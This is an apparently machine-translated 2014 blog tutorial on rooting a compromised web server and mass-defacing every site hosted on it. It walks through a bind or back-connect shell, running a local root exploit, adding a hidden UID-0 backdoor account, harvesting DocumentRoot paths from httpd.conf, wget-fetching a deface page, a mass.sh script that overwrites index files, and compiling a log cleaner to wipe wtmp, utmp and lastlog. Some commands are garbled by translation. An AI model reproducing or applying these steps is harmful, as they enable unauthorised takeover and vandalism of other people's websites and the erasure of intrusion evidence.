Smiley face
Smiley face

Thursday, February 6, 2014

Manual mass defacing - Clean Log (Totaly Explained)

backconect first kmu dlu into your shell,. it is up to pke what keq,. nc or bind shell. I disni make-bind shell. 
comand2'a, check it out in the picture, ..
http://bie.nazuka.net/rooting/Screenshot.png




after checking the kernel n all macem'a, .. kmu upload localroot same kernel that fits in your shell,. trus love tuh chmod 777 on local,
http://bie.nazuka.net/rooting/Screenshot-1.png




tggal local smokers who run it sdah kmu uploaded earlier,. 
http://bie.nazuka.net/rooting/Screenshot-2.png



Klo managed to root, MKA id'a changed, just as all pictures above. stage akhir'a,. tggal add usermu wrote distu,.


http://bie.nazuka.net/rooting/Screenshot-3.png




When it was successful,. jadi'a kek gini
http://bie.nazuka.net/rooting/Screenshot-4.png




penjelasan'a, .. 

PHP Code:
adduser  - u 0  - o  - g 0  - G 0 , 1 , 2 , 3 , 4 , 6 , 10  - M ftp - user
adduser  =  comand for user nambahin
- u 0  - o  =  set user ID so dngn zero  ( 0 )  root .
- g 0  =  initial sets the group ID of zero  ( 0 )  root .
- G 0 , 1 , 2 , 3 , 4 , 6 , 10  =  set additional group to :
0  =  root
1  =  bin
2  =  daemon
3  =  sys
4  =  adm
6  =  disk
10  =  wheel
- M - 'home directory' is not on the user to create .
ftp - user  =  username dri users who want dipke 

sekrang what else.?? 
yeah it is up to you whether,. ntah it going on sale, pke sndri going on, or going on deface,. 
thx in defacement, we go again. : D login in putty and enter the server ip and port we want to mass deface, ..


http://img708.imageshack.us/img708/5115/52fe6d4c3f5f4e5fa6271db.png




Now we get into the " etc / httpd / conf "to retrieve all the user names n existing website in sever .. we enter the following comand:

PHP Code:
cd  / etc / httpd / conf 

after that we took all the names that are on the web server and mengcopy'a in our shell with the name " web.txt "(it does what the name would pke) 
comand'a: 

PHP Code:
httpd paint . conf  |  grep  - i servername  > / home / username / public_html / web . txt 
for username , Klian you can see in the shell masing2 ...

http://i.imgur.com/HdghNpj.png




Now we take another nama2 user'a, then copy all users in the user.txt to notepad .. 
comand'a:

PHP Code:
httpd paint . conf  |  grep  - i DocumentRoot  > / home / username / public_html / user . txt 

http://img40.imageshack.us/img40/1584/88f8750f45984456a704565.png




after that we go back to the root dir, and create a new dir (dir name is up to pke what, here I pke bie dir name) and we went into a new dir that we make it, and our download page defacement us into our new-dir make it, .. 
comand'a:

PHP Code:
cd  / root ;  mkdir bie ;  bie cd
wget http : / / blablabla.com / deface.html 
http://i.imgur.com/0OSGSIS.png



ok,. we've pnya deface page, we now make our mass.sh file first, .. 
replace all the words " DocumentRoot "with" cp defacepage.html "disni that we need to consider, if we want to put us in the index file deface, MKA we use " cp index.html "if not, can Klian mengganti'a with another file name, .. Here I pke " bie.htm "
http://i.imgur.com/qm0DEhe.png




then back to our putty, type the comand " nano mass.sh "then copy and paste all the names of our users who already switch earlier, after the control type" o ", enter, then control the" x "to kmbali, .. 
after that we give perm 777 on mass.sh us, then we run mass.sh

PHP Code:
chmod 777 mass . sh ;. / mass . sh 
http://img202.imageshack.us/img202/8761/68beffb40e24488ba47018b.png



yep, .. selese mass deface'a, .. 
now back to the root dir, then delete the new dir before you make 
your cleaner and run log, then exit .. :) 
http://i.imgur.com/1Jv4i7e.png




log cleaner can Klian dapet dsini: http://pastebin.com/Csfw9BrY 
pke'a way: 
1. Copy source cleaner'a log in notepad and then save with the name remove.c note
http://i.imgur.com/bHx73vo.png




Please remember that it is not always file2 wtmp utmp and lastlog are in the same position so do not forget to check whether the position file2 wtmp utmp and lastlog are in accordance with the source remove.c log'a or not, .. 
You can use the command to search for files posisi2 DIMA wtmp utmp and lastlog:

PHP Code:
find  / - name wtmp  -print
find  / - name utmp  -print
find  / - name lastlog  -print
or
whereis wtmp
utmp whereis
whereis lastlog 


Then replace the file2 position in remove.c-me you save the notepad in accordance with the above results, .. 2. Once we change, upload to server / site that we have my root,. saat'a we compile,. or could jga compile all the desktop (for linux users)


PHP Code:
remove gcc . c  - o remove  - DGENERIC
remove . c :  In  function ` play ':
remove.c: 50: warning: return type of  ` play 'is not `int'
/ tmp / ccZVzySI . o :  In  function ` play ' :
/ tmp / ccZVzySI.o (. text +0 XB4): the  ` gets 'function is dangerous and should
not be used. 
and lastly we run remove'a,. :)
PHP Code:
. / remove namarootuser 

tggal then enter pilihan'a, .. :)
http://i.imgur.com/8CITRjF.png




terkhir, we replace all the words " SeverName "with" http:// " 

shell yg aku pke diatas : http://pastebin.com/0N805eLE
log cleaner : http://pastebin.com/Csfw9BrY 
NC : http://joncraton.org/media/files/nc111nt.zip
puttty : http://portableapps.com/apps/internet/putty_portable

0 Comments:

Post a Comment

Smiley face
Smiley face